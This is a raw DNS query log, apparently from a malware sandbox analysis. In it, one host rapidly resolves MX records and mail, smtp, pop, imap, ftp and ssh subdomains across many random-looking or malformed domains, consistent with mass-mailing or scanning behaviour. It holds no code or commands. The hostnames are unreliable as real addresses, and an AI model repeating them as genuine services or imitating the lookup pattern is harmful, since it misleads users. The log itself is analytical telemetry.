Nov 30, 2023 11:23:25.503844023 CET	192.168.2.4	1.1.1.1	0x12b9	Standard query (0)	avabme220ail.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:25.504359961 CET	192.168.2.4	1.1.1.1	0x4d05	Standard query (0)	m1ukgoy8a.ua	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:25.504359961 CET	192.168.2.4	1.1.1.1	0x6186	Standard query (0)	imap.joaionlnal.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:25.504802942 CET	192.168.2.4	1.1.1.1	0x6274	Standard query (0)	aclfpxvr.nedwc	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:25.505748987 CET	192.168.2.4	1.1.1.1	0xafda	Standard query (0)	pop.gw.ky	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:25.557075024 CET	192.168.2.4	1.1.1.1	0x4424	Standard query (0)	www.dnasl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:25.557730913 CET	192.168.2.4	1.1.1.1	0x9177	Standard query (0)	gporaja.co.uk	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:25.558047056 CET	192.168.2.4	1.1.1.1	0xeffc	Standard query (0)	amerite.varym	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:25.559000015 CET	192.168.2.4	1.1.1.1	0x3bbb	Standard query (0)	tele8mail.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:25.608952045 CET	192.168.2.4	1.1.1.1	0x60f1	Standard query (0)	pop.joaionlnal.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:25.679464102 CET	192.168.2.4	1.1.1.1	0x1df0	Standard query (0)	sdas.d20ail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:25.746862888 CET	192.168.2.4	1.1.1.1	0xa9dc	Standard query (0)	ht.am.cz	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:25.934782982 CET	192.168.2.4	1.1.1.1	0x60f1	Standard query (0)	pop.joaionlnal.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:26.063399076 CET	192.168.2.4	1.1.1.1	0xcb10	Standard query (0)	m1ukgoy8a.ua	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:26.063399076 CET	192.168.2.4	1.1.1.1	0x17ce	Standard query (0)	c.mail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:26.065531015 CET	192.168.2.4	1.1.1.1	0x2cae	Standard query (0)	amerite.varym	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:26.067246914 CET	192.168.2.4	1.1.1.1	0x5481	Standard query (0)	gporaja.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:26.406836987 CET	192.168.2.4	1.1.1.1	0xf1ad	Standard query (0)	ssh.hitamoelka237lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:26.407553911 CET	192.168.2.4	1.1.1.1	0xbd55	Standard query (0)	gadtolsr2l1l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:26.408677101 CET	192.168.2.4	1.1.1.1	0x87c5	Standard query (0)	s93ail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:26.411530972 CET	192.168.2.4	1.1.1.1	0xe209	Standard query (0)	pop.eok5ofmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:26.411530972 CET	192.168.2.4	1.1.1.1	0x376a	Standard query (0)	ht.am.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:26.991261959 CET	192.168.2.4	1.1.1.1	0x376a	Standard query (0)	ht.am.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:26.996146917 CET	192.168.2.4	1.1.1.1	0x2dff	Standard query (0)	avabme220ail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.002489090 CET	192.168.2.4	1.1.1.1	0xa4e3	Standard query (0)	aclfpxvr.nedwc	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.006592035 CET	192.168.2.4	1.1.1.1	0x71d4	Standard query (0)	tele8mail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.008089066 CET	192.168.2.4	1.1.1.1	0x9212	Standard query (0)	il.cam	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.197993040 CET	192.168.2.4	1.1.1.1	0xbc84	Standard query (0)	imap.gw.ky	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.272974014 CET	192.168.2.4	1.1.1.1	0x8067	Standard query (0)	mail.am.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.274096966 CET	192.168.2.4	1.1.1.1	0xe372	Standard query (0)	imap.ideo1e.priisav.06eieic.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.274513960 CET	192.168.2.4	1.1.1.1	0xa2b9	Standard query (0)	pop.hitamoelka237lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.386001110 CET	192.168.2.4	1.1.1.1	0xfb01	Standard query (0)	imap.eok5ofmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.399960995 CET	192.168.2.4	1.1.1.1	0x5f90	Standard query (0)	pop3.ideo1e.priisav.06eieic.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.400911093 CET	192.168.2.4	1.1.1.1	0x3bc	Standard query (0)	pop3.xezail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.482872009 CET	192.168.2.4	1.1.1.1	0xb52a	Standard query (0)	imap.hitamoelka237lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.515151978 CET	192.168.2.4	1.1.1.1	0x8067	Standard query (0)	mail.am.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.517502069 CET	192.168.2.4	1.1.1.1	0x65f4	Standard query (0)	pop.ciszxujgaiatail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.846652985 CET	192.168.2.4	1.1.1.1	0x647	Standard query (0)	ftp.liks.cohlm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.963848114 CET	192.168.2.4	1.1.1.1	0xc237	Standard query (0)	pop3.joaionlnal.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.966746092 CET	192.168.2.4	1.1.1.1	0x7f87	Standard query (0)	ftp.sdas.d20ail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.966746092 CET	192.168.2.4	1.1.1.1	0xf747	Standard query (0)	imap.gmaso.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.967053890 CET	192.168.2.4	1.1.1.1	0x48a7	Standard query (0)	mail.liks.cohlm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.970935106 CET	192.168.2.4	1.1.1.1	0x433	Standard query (0)	pop3.gw.ky	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.970935106 CET	192.168.2.4	1.1.1.1	0xe102	Standard query (0)	www.luxusnipradlo.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.981389046 CET	192.168.2.4	1.1.1.1	0x20ec	Standard query (0)	relay.a6a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.981389046 CET	192.168.2.4	1.1.1.1	0xadbe	Standard query (0)	mail.gco.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.981594086 CET	192.168.2.4	1.1.1.1	0x6f00	Standard query (0)	mail.apee.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.981772900 CET	192.168.2.4	1.1.1.1	0x6062	Standard query (0)	ftp.m1ukgoy8a.ua	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.982089996 CET	192.168.2.4	1.1.1.1	0x5776	Standard query (0)	ftp.gadtolsr2l1l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.982593060 CET	192.168.2.4	1.1.1.1	0xb93a	Standard query (0)	h.tlgcom	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:27.982593060 CET	192.168.2.4	1.1.1.1	0xc74b	Standard query (0)	ftp.s93ail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.982863903 CET	192.168.2.4	1.1.1.1	0x1b06	Standard query (0)	ftp.gporaja.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.005012035 CET	192.168.2.4	1.1.1.1	0xb34a	Standard query (0)	pop3.e1a73a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.005012035 CET	192.168.2.4	1.1.1.1	0x6d0d	Standard query (0)	mail.gporaja.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.006881952 CET	192.168.2.4	1.1.1.1	0xa273	Standard query (0)	pop3.eok5ofmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.006881952 CET	192.168.2.4	1.1.1.1	0xd801	Standard query (0)	mail.m1ukgoy8a.ua	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.070467949 CET	192.168.2.4	1.1.1.1	0x809c	Standard query (0)	mail.z-a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.176702976 CET	192.168.2.4	1.1.1.1	0x9902	Standard query (0)	ftp.aclfpxvr.nedwc	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.176702976 CET	192.168.2.4	1.1.1.1	0x2f6f	Standard query (0)	mail.amerite.varym	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.178425074 CET	192.168.2.4	1.1.1.1	0xd3da	Standard query (0)	mail.sdas.d20ail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.181058884 CET	192.168.2.4	1.1.1.1	0x22a1	Standard query (0)	mail.s93ail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.181058884 CET	192.168.2.4	1.1.1.1	0xbf30	Standard query (0)	relay.hyeail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.181694984 CET	192.168.2.4	1.1.1.1	0xde06	Standard query (0)	ftp.tele8mail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.184776068 CET	192.168.2.4	1.1.1.1	0x5c88	Standard query (0)	mail.il.cam	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.185250998 CET	192.168.2.4	1.1.1.1	0xc66a	Standard query (0)	mail.aclfpxvr.nedwc	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.185543060 CET	192.168.2.4	1.1.1.1	0x7630	Standard query (0)	h.tlgcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.186650038 CET	192.168.2.4	1.1.1.1	0x8d6	Standard query (0)	mailgate.ytgaig.tcueain.ch	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.186892033 CET	192.168.2.4	1.1.1.1	0x5d2f	Standard query (0)	mailgate.yma4j.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.188532114 CET	192.168.2.4	1.1.1.1	0x139	Standard query (0)	mail.gadtolsr2l1l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.189121962 CET	192.168.2.4	1.1.1.1	0x7da7	Standard query (0)	mailgate.hi9tail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.189475060 CET	192.168.2.4	1.1.1.1	0x162b	Standard query (0)	relay.md.coyar.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.190695047 CET	192.168.2.4	1.1.1.1	0x92e6	Standard query (0)	mailgate.dtianekicomail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.190934896 CET	192.168.2.4	1.1.1.1	0x4748	Standard query (0)	mailgate.naburly26a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.191665888 CET	192.168.2.4	1.1.1.1	0xcc94	Standard query (0)	relay.6eyaok.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.191665888 CET	192.168.2.4	1.1.1.1	0x69b2	Standard query (0)	ftp.amerite.varym	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.202344894 CET	192.168.2.4	1.1.1.1	0xe1c	Standard query (0)	relay.n.zcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.221503973 CET	192.168.2.4	1.1.1.1	0x4230	Standard query (0)	ssh.liks.cohlm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.221504927 CET	192.168.2.4	1.1.1.1	0xf747	Standard query (0)	imap.gmaso.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.222614050 CET	192.168.2.4	1.1.1.1	0x421	Standard query (0)	ftp.il.cam	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.222858906 CET	192.168.2.4	1.1.1.1	0xffa4	Standard query (0)	ftp.avabme220ail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.223206043 CET	192.168.2.4	1.1.1.1	0x8410	Standard query (0)	mailgate.e1a73a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.224442959 CET	192.168.2.4	1.1.1.1	0x3373	Standard query (0)	mail.avabme220ail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.227193117 CET	192.168.2.4	1.1.1.1	0xd018	Standard query (0)	mail.tele8mail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.232244015 CET	192.168.2.4	1.1.1.1	0xadbe	Standard query (0)	mail.gco.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.232300043 CET	192.168.2.4	1.1.1.1	0x6f00	Standard query (0)	mail.apee.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.234925032 CET	192.168.2.4	1.1.1.1	0xaed2	Standard query (0)	ssh.gadtolsr2l1l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.235447884 CET	192.168.2.4	1.1.1.1	0x635f	Standard query (0)	ssh.amerite.varym	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.235932112 CET	192.168.2.4	1.1.1.1	0xc84a	Standard query (0)	ssh.m1ukgoy8a.ua	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.236063957 CET	192.168.2.4	1.1.1.1	0x8b3b	Standard query (0)	mailgate.xezail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.243419886 CET	192.168.2.4	1.1.1.1	0xe7c2	Standard query (0)	mailgate.joaionlnal.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.246752024 CET	192.168.2.4	1.1.1.1	0xa273	Standard query (0)	pop3.eok5ofmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.247112036 CET	192.168.2.4	1.1.1.1	0x8c85	Standard query (0)	ssh.sdas.d20ail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.277424097 CET	192.168.2.4	1.1.1.1	0x9552	Standard query (0)	pop3.hitamoelka237lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.294631004 CET	192.168.2.4	1.1.1.1	0x7ed6	Standard query (0)	imap.ciszxujgaiatail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.296730995 CET	192.168.2.4	1.1.1.1	0x85fc	Standard query (0)	pop3.ciszxujgaiatail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.327400923 CET	192.168.2.4	1.1.1.1	0x4958	Standard query (0)	ssh.s93ail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.327749968 CET	192.168.2.4	1.1.1.1	0xf926	Standard query (0)	ssh.gporaja.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.339425087 CET	192.168.2.4	1.1.1.1	0xadb1	Standard query (0)	mailgate.ideo1e.priisav.06eieic.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.339425087 CET	192.168.2.4	1.1.1.1	0xdca3	Standard query (0)	ssh.il.cam	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.341033936 CET	192.168.2.4	1.1.1.1	0x9755	Standard query (0)	ssh.aclfpxvr.nedwc	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.351802111 CET	192.168.2.4	1.1.1.1	0x8c7f	Standard query (0)	ssh.avabme220ail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.357122898 CET	192.168.2.4	1.1.1.1	0xf74e	Standard query (0)	ssh.tele8mail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.383250952 CET	192.168.2.4	1.1.1.1	0xf307	Standard query (0)	pop.liks.cohlm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.384627104 CET	192.168.2.4	1.1.1.1	0xa933	Standard query (0)	mailgate.gw.ky	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.385504961 CET	192.168.2.4	1.1.1.1	0x84fa	Standard query (0)	mailgate.eok5ofmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.434376955 CET	192.168.2.4	1.1.1.1	0xcc94	Standard query (0)	relay.6eyaok.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.434541941 CET	192.168.2.4	1.1.1.1	0x92e6	Standard query (0)	mailgate.dtianekicomail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.460405111 CET	192.168.2.4	1.1.1.1	0x8d0c	Standard query (0)	mailgate.hitamoelka237lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.497294903 CET	192.168.2.4	1.1.1.1	0xa121	Standard query (0)	smtp.xezail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.527013063 CET	192.168.2.4	1.1.1.1	0xc1ef	Standard query (0)	pop.m1ukgoy8a.ua	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.541177034 CET	192.168.2.4	1.1.1.1	0xeb97	Standard query (0)	pop.gporaja.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.549215078 CET	192.168.2.4	1.1.1.1	0xfb10	Standard query (0)	pop.aclfpxvr.nedwc	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.549431086 CET	192.168.2.4	1.1.1.1	0x4d2d	Standard query (0)	ftp.h.tlgcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.555305958 CET	192.168.2.4	1.1.1.1	0x1e1a	Standard query (0)	pop.sdas.d20ail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.573523998 CET	192.168.2.4	1.1.1.1	0x945d	Standard query (0)	pop.gadtolsr2l1l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.575143099 CET	192.168.2.4	1.1.1.1	0x4958	Standard query (0)	ssh.s93ail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.577069044 CET	192.168.2.4	1.1.1.1	0x1b70	Standard query (0)	imap.liks.cohlm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.584554911 CET	192.168.2.4	1.1.1.1	0x52f2	Standard query (0)	imap.m1ukgoy8a.ua	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.586657047 CET	192.168.2.4	1.1.1.1	0xd6c7	Standard query (0)	pop.avabme220ail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.599788904 CET	192.168.2.4	1.1.1.1	0xa68d	Standard query (0)	pop.amerite.varym	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.600125074 CET	192.168.2.4	1.1.1.1	0xeed0	Standard query (0)	relay.xezail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.601530075 CET	192.168.2.4	1.1.1.1	0x9858	Standard query (0)	smtp.joaionlnal.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.603357077 CET	192.168.2.4	1.1.1.1	0x28cd	Standard query (0)	mail.h.tlgcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.606473923 CET	192.168.2.4	1.1.1.1	0xf74e	Standard query (0)	ssh.tele8mail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.626391888 CET	192.168.2.4	1.1.1.1	0xc2ae	Standard query (0)	pop.il.cam	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.630963087 CET	192.168.2.4	1.1.1.1	0xfc81	Standard query (0)	pop.tele8mail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.631104946 CET	192.168.2.4	1.1.1.1	0x108c	Standard query (0)	pop.s93ail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.631463051 CET	192.168.2.4	1.1.1.1	0x19f9	Standard query (0)	imap.z-a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.669745922 CET	192.168.2.4	1.1.1.1	0xea95	Standard query (0)	relay.joaionlnal.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.669991970 CET	192.168.2.4	1.1.1.1	0x8bfa	Standard query (0)	ssh.h.tlgcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.670435905 CET	192.168.2.4	1.1.1.1	0xcf58	Standard query (0)	imap.sdas.d20ail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.670798063 CET	192.168.2.4	1.1.1.1	0x8a8	Standard query (0)	imap.amerite.varym	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.672247887 CET	192.168.2.4	1.1.1.1	0xddf1	Standard query (0)	mailgate.ciszxujgaiatail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.675884962 CET	192.168.2.4	1.1.1.1	0x5316	Standard query (0)	smtp.e1a73a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.677683115 CET	192.168.2.4	1.1.1.1	0x85b7	Standard query (0)	smtp.ideo1e.priisav.06eieic.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.695836067 CET	192.168.2.4	1.1.1.1	0x212e	Standard query (0)	imap.aclfpxvr.nedwc	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.704262972 CET	192.168.2.4	1.1.1.1	0x762c	Standard query (0)	imap.il.cam	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.729257107 CET	192.168.2.4	1.1.1.1	0x55da	Standard query (0)	relay.ideo1e.priisav.06eieic.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.747466087 CET	192.168.2.4	1.1.1.1	0x75b6	Standard query (0)	imap.avabme220ail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.760380983 CET	192.168.2.4	1.1.1.1	0xd02a	Standard query (0)	smtp.gw.ky	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.813616991 CET	192.168.2.4	1.1.1.1	0x2752	Standard query (0)	imap.gporaja.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.814791918 CET	192.168.2.4	1.1.1.1	0x1cf	Standard query (0)	imap.gadtolsr2l1l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.816457987 CET	192.168.2.4	1.1.1.1	0x49d3	Standard query (0)	relay.e1a73a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.817190886 CET	192.168.2.4	1.1.1.1	0xe182	Standard query (0)	imap.gco.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.820790052 CET	192.168.2.4	1.1.1.1	0x8807	Standard query (0)	smtp.eok5ofmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.828134060 CET	192.168.2.4	1.1.1.1	0x945d	Standard query (0)	pop.gadtolsr2l1l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.839055061 CET	192.168.2.4	1.1.1.1	0xa293	Standard query (0)	mailgate.gmaso.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.842746019 CET	192.168.2.4	1.1.1.1	0x220a	Standard query (0)	smtp.hitamoelka237lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.844199896 CET	192.168.2.4	1.1.1.1	0x17ff	Standard query (0)	22.12l.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:28.844357014 CET	192.168.2.4	1.1.1.1	0xf94d	Standard query (0)	telenico8a-.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:28.845133066 CET	192.168.2.4	1.1.1.1	0xd006	Standard query (0)	co.uycom	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:28.845448017 CET	192.168.2.4	1.1.1.1	0xe41a	Standard query (0)	reyne5rzkhof1bet.be	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:28.845868111 CET	192.168.2.4	1.1.1.1	0xf340	Standard query (0)	vettguormebuhn.il.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:28.846142054 CET	192.168.2.4	1.1.1.1	0xaae	Standard query (0)	gco.uk	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:28.846213102 CET	192.168.2.4	1.1.1.1	0xbeef	Standard query (0)	y.latm	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:28.846364021 CET	192.168.2.4	1.1.1.1	0x3b29	Standard query (0)	tdwbknlil.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:28.848536015 CET	192.168.2.4	1.1.1.1	0x73ba	Standard query (0)	g.cojsuuol.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:28.850886106 CET	192.168.2.4	1.1.1.1	0x39f2	Standard query (0)	gm2008l.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:28.851970911 CET	192.168.2.4	1.1.1.1	0xf2e6	Standard query (0)	imap.tele8mail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.852020979 CET	192.168.2.4	1.1.1.1	0xc65c	Standard query (0)	7slembyjtczr.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:28.918632030 CET	192.168.2.4	1.1.1.1	0x79f8	Standard query (0)	jdmesbowkeo1abrnet.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:28.926512003 CET	192.168.2.4	1.1.1.1	0xef1e	Standard query (0)	pop3.liks.cohlm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.934197903 CET	192.168.2.4	1.1.1.1	0xd799	Standard query (0)	imap.s93ail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.939838886 CET	192.168.2.4	1.1.1.1	0x3ce8	Standard query (0)	smtp.ciszxujgaiatail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.944812059 CET	192.168.2.4	1.1.1.1	0x19ad	Standard query (0)	relay.eok5ofmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.946856976 CET	192.168.2.4	1.1.1.1	0x8efc	Standard query (0)	22.12l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.948098898 CET	192.168.2.4	1.1.1.1	0x597a	Standard query (0)	telenico8a-.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.955682993 CET	192.168.2.4	1.1.1.1	0xb096	Standard query (0)	co.uycom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.955873966 CET	192.168.2.4	1.1.1.1	0x917d	Standard query (0)	reyne5rzkhof1bet.be	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.956151962 CET	192.168.2.4	1.1.1.1	0x2c08	Standard query (0)	vettguormebuhn.il.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.964240074 CET	192.168.2.4	1.1.1.1	0x725b	Standard query (0)	relay.gw.ky	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.967004061 CET	192.168.2.4	1.1.1.1	0x4ca8	Standard query (0)	pop3.gporaja.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.969228029 CET	192.168.2.4	1.1.1.1	0x65fb	Standard query (0)	y.latm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.970290899 CET	192.168.2.4	1.1.1.1	0x4296	Standard query (0)	pop3.m1ukgoy8a.ua	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.970624924 CET	192.168.2.4	1.1.1.1	0x856a	Standard query (0)	tdwbknlil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.971041918 CET	192.168.2.4	1.1.1.1	0xd98f	Standard query (0)	g.cojsuuol.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.971141100 CET	192.168.2.4	1.1.1.1	0x7a10	Standard query (0)	gm2008l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.971349955 CET	192.168.2.4	1.1.1.1	0xf3e	Standard query (0)	7slembyjtczr.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.974410057 CET	192.168.2.4	1.1.1.1	0xe442	Standard query (0)	relay.hitamoelka237lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.975528002 CET	192.168.2.4	1.1.1.1	0xe039	Standard query (0)	pop3.aclfpxvr.nedwc	A (IP address)	IN (0x0001)	false
